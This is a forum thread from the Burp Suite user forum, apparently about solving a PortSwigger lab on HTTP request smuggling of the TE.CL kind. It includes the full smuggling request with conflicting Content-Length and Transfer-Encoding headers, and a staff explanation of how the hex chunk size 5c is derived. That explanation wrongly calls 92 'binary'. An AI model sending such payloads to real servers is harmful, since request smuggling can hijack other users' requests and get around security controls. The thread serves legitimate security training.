Burp Suite User Forum

Login to post

Lab: HTTP request smuggling, basic TE.CL vulnerability

Sidharthan | Last updated: Oct 20, 2020 09:02AM UTC

The solution for the challenge provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 How was the value 5c calculated ? And how do i calculate when i am sending different content.

Ben, PortSwigger Agent | Last updated: Oct 22, 2020 07:38AM UTC

Hi, 5c is the size of the first chunk in bytes expressed as hexadecimal, this in binary is 92. The size of the following text is 92 bytes, (The > at the end represents the carriage return to finish the chunk at the start of the next line which contains 0, which is the size of the next chunk in bytes): 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 > This is why 5c is used here.

Sidharthan | Last updated: Oct 22, 2020 08:03AM UTC

Thanks Ben for the explanation it cleared my doubt. Does "encode as" "Hex" option available in Burp Decoder meant for this conversion? Also does hackvector extender support byte to hex conversion ?

Ben, PortSwigger Agent | Last updated: Oct 23, 2020 08:55AM UTC

Hi, Yes, you can use the Burp Decoder to perform various types of encoding and decoding.

You need to Log in to post a reply. Or register here, for free.